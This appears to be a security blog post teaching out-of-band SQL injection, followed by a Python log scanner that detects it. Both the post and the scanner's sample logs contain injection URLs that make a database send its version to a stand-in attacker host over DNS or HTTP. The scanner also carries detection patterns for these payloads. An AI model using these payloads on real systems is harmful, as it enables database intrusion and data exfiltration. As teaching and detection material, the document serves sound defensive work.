Week 38 - Out of Band SQLi

Since last week we covered second-order SQL injection, I wanted to make this week’s post on a similar technique: Out-of-Band SQLi. If you’ve been following my weekly posts then you should already be plenty familiar with SQL injection, but what the heck does Out-of-Band mean? Out-of-Band means we receive the payload result through a different channel than the one the payload request went over. There are two main channels used for retrieving the payload result: DNS and HTTP.

Retrieving the payload result through DNS would look like the following SQL injection:

    vulnerable[.]com/test[.]php?id=1+UNION+SELECT+load_file(CONCAT("\\\\",(SELECT+@@version),".attacker[.]com\\test"))

Since the CONCAT function combines multiple strings into one, this injection makes the back-end database try to load a file from the following UNC path (once MySQL has un-escaped the doubled backslashes in the string literals):

    \\10.3.16-MariaDB[.]attacker[.]com\test

Before the server can reach that share it has to resolve the hostname, so the version string shows up as a DNS query for 10.3.16-MariaDB.attacker[.]com at the name server for attacker[.]com. So if we have a listener running on our attacker server, we can wait for incoming DNS requests and read the result straight out of the query name!

Now as mentioned before we can also use HTTP-based exfiltration, which is typically used when the back-end database is Oracle because it supports the UTL_HTTP.request function:

    vulnerable[.]com/test[.]php?id=1+UNION+SELECT+UTL_HTTP.request('http[:]//attacker[.]com/?version='||(SELECT+version+FROM+v$instance))+FROM+dual

This makes the database itself issue an HTTP request to the following URL:

    http[:]//attacker[.]com/?version=18.0.0.0.0

And we can just listen for incoming HTTP connections! This technique can be an exotic way of bypassing WAFs or exploiting a tricky injection. Worth adding to your pentest arsenal!
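As an added example that is not part of the original post, here is the log-side check a defender could run against web server access logs: it URL-decodes the query string of each request and flags the two out-of-band patterns discussed above, a load_file() call on a UNC path and a UTL_HTTP.request() call. The Apache-style log lines and the attacker.example domain are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" style access log lines, constructed for this example.
# Lines 2 and 3 mirror the DNS and HTTP out-of-band payloads described above;
# attacker.example is a placeholder domain.
SAMPLE_LOG = r'''203.0.113.5 - - [12/Mar/2024:10:01:02 +0000] "GET /test.php?id=1 HTTP/1.1" 200 512
203.0.113.9 - - [12/Mar/2024:10:01:05 +0000] "GET /test.php?id=1+UNION+SELECT+load_file(CONCAT(%22%5C%5C%5C%5C%22,(SELECT+@@version),%22.attacker.example%5C%5Ctest%22)) HTTP/1.1" 200 512
203.0.113.9 - - [12/Mar/2024:10:01:09 +0000] "GET /test.php?id=1+UNION+SELECT+UTL_HTTP.request(%27http://attacker.example/?version=%27%7C%7C(SELECT+version+FROM+v$instance))+FROM+dual HTTP/1.1" 500 0
203.0.113.7 - - [12/Mar/2024:10:01:12 +0000] "GET /search.php?q=load+file+help HTTP/1.1" 200 2048'''

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT) (\S+) HTTP/')

# Each signature names the out-of-band channel it indicates; matched after URL decoding.
OOB_SIGNATURES = {
    # MySQL/MariaDB: load_file() on a UNC path (\\host\share) forces a DNS lookup of host
    "dns-unc-load_file": re.compile(r"load_file\s*\(.*?\\\\", re.I | re.S),
    # Oracle: UTL_HTTP.request() makes the database itself send an outbound HTTP request
    "http-utl_http": re.compile(r"utl_http\s*\.\s*request\s*\(", re.I),
}


def decode_query(request_target: str) -> str:
    """Return all query parameter values of a request target, URL-decoded and joined."""
    query = urlsplit(request_target).query
    return " ".join(v for _, v in parse_qsl(query, keep_blank_values=True))


def scan_access_log(log_text: str) -> list[dict]:
    """Flag requests whose decoded query string carries an out-of-band SQLi signature."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        decoded = decode_query(m.group(1))
        for channel, pattern in OOB_SIGNATURES.items():
            if pattern.search(decoded):
                hits.append({"line": lineno, "client": line.split()[0],
                             "channel": channel, "decoded": decoded})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"line {hit['line']} from {hit['client']}: {hit['channel']} -> {hit['decoded']}")
```

A check like this complements rather than replaces the real fix: parameterised queries on the application side, plus denying outbound DNS and HTTP from the database host so the second channel has nowhere to go.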